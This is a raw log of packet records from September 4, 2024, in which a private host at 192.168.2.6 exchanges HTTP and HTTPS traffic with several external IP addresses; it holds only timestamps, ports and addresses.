Sep 4, 2024 17:37:05.667911053 CEST	49723	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:05.668225050 CEST	49723	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:05.674141884 CEST	80	49723	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:05.796566010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.796781063 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.796952963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.801819086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.822283030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.822344065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.822613955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.827446938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.982186079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.982283115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.982479095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.987387896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.007229090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.007272959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.007441998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.013410091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.157095909 CEST	80	49723	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.157284975 CEST	49723	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.157284975 CEST	49723	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.157685995 CEST	49724	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.162157059 CEST	80	49723	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.162600040 CEST	80	49724	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.162658930 CEST	49724	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.162736893 CEST	49724	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.163419962 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.163458109 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.163511038 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.163738012 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.163750887 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.164539099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.164597988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.164747000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.167906046 CEST	80	49724	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.167963982 CEST	49724	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.169503927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.192671061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.192745924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.193109035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.199933052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.346296072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.346369982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.346549034 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.351428032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.379570961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.379640102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.380023956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.384862900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.530119896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.530198097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.530411959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.538889885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564774036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564801931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564815044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564826012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564840078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564850092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564858913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.564860106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564877033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564892054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.564935923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.564950943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.564989090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.565473080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.565515995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.565542936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.565577984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.565593958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.565606117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.565629005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.565649986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.566025972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.566070080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.656795025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.656836987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.656847000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.656852007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.656876087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.656892061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.656928062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.656965971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.657181978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.657223940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.657228947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.657264948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.657512903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.657553911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.657576084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.657615900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.657836914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.657879114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.657897949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.657910109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.657937050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.657951117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.657980919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.658020973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.658736944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.658777952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.658809900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.658823013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.658849001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.658862114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.658885002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.658921957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.659600019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.659640074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.659652948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.659667015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.659697056 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.659710884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.659739017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.659779072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.660485029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.660546064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.661293030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.661334991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.661621094 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.661688089 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.667232037 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.667247057 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.667514086 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.667560101 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.668334007 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.708494902 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.715758085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.715816975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.715821981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.715827942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.715858936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.715868950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.715879917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.715889931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.715900898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.715915918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.715943098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.716610909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.716649055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.716665983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.716677904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.716701031 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.716713905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.716751099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.716787100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.717442036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.717479944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.717510939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.717521906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.717540026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.717556000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.745615005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.745640039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.745651960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.745686054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.745702982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.745738029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.745774031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.746031046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.746082067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.746191978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.746242046 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.746242046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.746258020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.746287107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.746299028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.746344090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.746387005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.747062922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.747112989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.747127056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.747138023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.747159958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.747176886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.747196913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.747240067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.747935057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.747975111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.747977018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.747987032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.748012066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.748025894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.748045921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.748085022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.748801947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.748841047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.748859882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.748872995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.748892069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.748912096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.748950958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.748990059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.749695063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.749739885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.749768019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.749782085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.749806881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.749825954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.749845982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.749880075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.750560999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.750607014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.750634909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.750649929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.750669003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.750679016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.750690937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.750710011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.805807114 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.805882931 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.805898905 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.805922031 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:06.805938005 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.805960894 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.806863070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.806915045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.806943893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.806957006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.806988955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.807013988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.807024956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.807037115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.807061911 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.807076931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.807286978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.807353020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.807363987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.807466984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.807477951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.807521105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.807564974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.808190107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.808242083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.808280945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.808294058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.808329105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.808357000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.808367968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.808393955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.808418989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.809086084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.809130907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.809148073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.809159994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.809197903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.809283018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.809295893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:06.809319973 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.809335947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:06.811278105 CEST	49725	443	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:06.811294079 CEST	443	49725	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:07.073127031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073142052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073153973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073185921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073198080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073296070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073307991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073318958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073318005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073318958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073329926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073342085 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073344946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073348999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073378086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073550940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073564053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073575020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073585987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073599100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073611975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073786974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073797941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073808908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073820114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073831081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073838949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073852062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073852062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073864937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073873997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073874950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073889017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073894024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073901892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073913097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073915005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073925018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073935986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.073940992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073955059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.073981047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074620008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074632883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074642897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074655056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074666023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074666023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074677944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074681044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074690104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074704885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074708939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074722052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074729919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074733973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074739933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074747086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074757099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074768066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074770927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074780941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074793100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074795961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074804068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.074811935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074836016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.074860096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075408936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075422049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075432062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075444937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075454950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075455904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075480938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075481892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075495005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075581074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075810909 CEST	80	49720	154.216.17.178	192.168.2.6
